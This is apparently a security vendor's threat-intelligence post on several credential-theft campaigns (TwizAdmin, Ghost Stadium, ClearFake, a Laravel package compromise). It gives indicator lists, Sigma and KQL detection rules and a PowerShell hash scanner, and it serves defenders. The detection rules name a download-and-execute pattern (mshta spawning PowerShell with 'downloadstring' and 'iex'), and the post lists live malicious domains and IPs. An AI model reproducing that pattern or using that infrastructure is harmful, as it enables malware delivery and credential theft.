Back to Intelligence

TwizAdmin, Ghost Stadium & Laravel Supply Chain: Multi-Vector Credential Theft Ecosystem — OTX Pulse Analysis

SA
Security Arsenal Team
May 27, 2026
6 min read

Recent OTX pulses indicate a surge in diverse credential theft tactics ranging from sophisticated multi-platform malware to supply chain compromises. The TwizAdmin operation is utilizing a novel FastAPI C2 panel to manage cross-platform crypto-clipping and credential theft. Simultaneously, the GHOST STADIUM campaign is leveraging global events (FIFA 2026) to distribute Vidar and Lumma stealers via massive phishing infrastructure. Separately, a critical supply chain attack on Laravel Lang packages and the ClearFake use of blockchain smart contracts for C2 highlight the evolving obfuscation techniques used by adversaries to harvest sensitive data and maintain persistence.

Threat Actor / Malware Profile

CampaignActorMalware/ToolsDistributionBehavior
TwizAdminDataBreachPlusTwizAdmin, crpx0 Ransomware, Java RATFedEx-themed lures, Multi-platform (Win/macOS)Clipboard hijacking (8 chains), BIP-39 phrase theft, Browser cred exfil, FastAPI C2.
GHOST STADIUMGHOST STADIUMVidar, LummaFacebook Ads, Phishing-as-a-Service (300+ domains)FIFA World Cup ticket fraud, credential harvesting, pixel-perfect auth system clones.
ClearFakeUnknownSectopRAT, ACRStealerCompromised sites (Swiss focus), injected JS"EtherHiding" technique using BNB Smart Chain testnet for immutable C2 instructions.
Laravel CompromiseUnknownhelpers.php backdoor, DebugChromium.exeSupply Chain (Composer packages)RCE via malicious package tags, payload delivery from flipboxstudio.info.
Cloud AtlasInception FrameworkPowerCloud, VBCloud, ValleyRATPhishing (ZIP/LNK)Targeting Gov/Russia-Belarus, network recon, file theft.

IOC Analysis

The provided pulses present a high volume of actionable indicators spanning multiple infrastructure types:

  • Domains & URLs: Over 60 fraudulent domains related to FIFA (e.g., fifa.gold, fifa.black) and malicious infrastructure for TwizAdmin (fanonlyatn.xyz) and ClearFake (.cfd, .lat TLDs). These should be immediately sinkholed or blocked at the DNS layer.
  • IP Addresses: Specific C2 IPs such as 103.241.66[.]238 (TwizAdmin) and 148.178.22.16 (Ghost Stadium) provide direct network-level blockable artifacts.
  • File Hashes: Multiple SHA256 hashes for the TwizAdmin payloads (e.g., 0629967...) and the specific Laravel payload DebugChromium.exe allow for exact-match scanning on endpoints.
  • Operationalization: SOC teams should ingest these IOCs into EDR and SIEM platforms. Domains like fifa.gold serve as high-fidelity triggers for phishing alerts. The .cfd and .lat TLDs, while less common, are heavily utilized in the ClearFake campaign for C2 traffic and should be scrutinized if not outright blocked.

Detection Engineering

Sigma Rules

YAML
title: Potential TwizAdmin or ClearFake C2 Traffic via Suspicious TLDs
id: 6a4b5c12-8d9e-4f5a-9b2c-1d3e4f5a6b7c
description: Detects network connections to TLDs (.xyz, .cfd, .lat) associated with TwizAdmin C2 and ClearFake EtherHiding campaigns.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: network_connection
product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains:
            - '.xyz'
            - '.cfd'
            - '.lat'
            - '.top'
    condition: selection
falsepositives:
    - Legitimate software using uncommon TLDs
level: medium
tags:
    - attack.command_and_control
    - attack.t1071.001
---
title: Laravel Backdoor Payload Execution
id: b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects execution of DebugChromium.exe, a specific payload associated with the Laravel Lang supply chain compromise.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: process_creation
product: windows
detection:
    selection:
        Image|endswith:
            - '\DebugChromium.exe'
        CommandLine|contains: 'flipboxstudio.info'
    condition: selection
falsepositives:
    - Unlikely, specific to malware campaign
level: critical
tags:
    - attack.initial_access
    - attack.t1195.002
---
title: Ghost Stadium Phasing Loader Activity
id: c3d4e5f6-7a8b-9c0d-1e2f-3a4b5c6d7e8f
description: Detects behavior consistent with Vidar/Lumma loaders often used in GHOST STADIUM campaigns, involving mshta.exe launching powershell.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: process_creation
product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\mshta.exe'
            - '\wscript.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
    condition: selection
falsepositives:
    - Legitimate system administration scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Ghost Stadium and TwizAdmin Network Indicators
let IoC_Domains = pack_array(
    'fanonlyatn.xyz', 
    'fifa.gold', 'fifa.black', 'fifa.tax', 'fifaweb.com', 'fifa.red', 'fifa.fund', 'fifa-com.shop',
    'afraid.veloitall.cfd', 'root-cul.xamir3on.lat', 'flipboxstudio.info'
);
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or 
          RemoteUrl has_any (".cfd", ".lat") // Broaden for ClearFake infrastructure
| summarize Count = count(), TimeGenerated = bin(TimeGenerated, 1h) by DeviceName, RemoteUrl, InitiatingProcessFileName
| order by Count desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Scanner for TwizAdmin Hashes and Laravel Payloads
.DESCRIPTION
    Scans specific paths and running processes for SHA256 hashes associated with the TwizAdmin campaign 
    and the Laravel Lang backdoor payload.
#>

$TwizHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec"
)

Write-Host "[+] Checking for DebugChromium.exe (Laravel Payload)..."
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")
foreach ($path in $PathsToScan) {
    Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue -Filter "DebugChromium.exe" | ForEach-Object {
        Write-Host "[!] Suspicious file found: $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Scanning for TwizAdmin Hashes in User Directories..."
Get-ChildItem -Path "C:\Users\" -Recurse -Include *.exe, *.dll, *.zip -ErrorAction SilentlyContinue | ForEach-Object {
    $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash.ToLower()
    if ($TwizHashes -contains $hash) {
        Write-Host "[!] TwizAdmin Malware Found: $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Checking Hosts file for malicious domains..."
$HostsContent = Get-Content -Path "$env:SystemRoot\System32\drivers\etc\hosts"
$MaliciousDomains = @("fanonlyatn.xyz", "fifa.gold", "flipboxstudio.info")
foreach ($line in $HostsContent) {
    foreach ($dom in $MaliciousDomains) {
        if ($line -like "*$dom*") {
            Write-Host "[!] Malicious entry in hosts file: $line" -ForegroundColor Yellow
        }
    }
}


# Response Priorities

*   **Immediate**:
    *   Block all domains listed in the IOC Analysis at the perimeter and DNS forwarders.
    *   Scan endpoints for the SHA256 hashes associated with **TwizAdmin** and the file name `DebugChromium.exe`.
    *   Block network access to `103.241.66[.]238` and `148.178.22.16`.
*   **24 Hours**:
    *   Identify and isolate machines that have contacted the identified GHOST STADIUM phishing domains (potential credential compromise).
    *   Conduct a supply chain audit on systems using **Laravel**, specifically checking `laravel-lang` packages for malicious versions (May 22-23, 2026 tags).
    *   Force reset credentials for developer accounts with access to CI/CD pipelines, given the Laravel compromise nature.
*   **1 Week**:
    *   Implement browser security policies to restrict clipboard access (mitigation for crypto-clippers).
    *   Review and restrict the use of `.cfd`, `.lat`, and `.xyz` TLDs for non-business critical traffic.
    *   Harden developer workstations against dependency confusion attacks.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealertwizadminlummaclearfakesupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action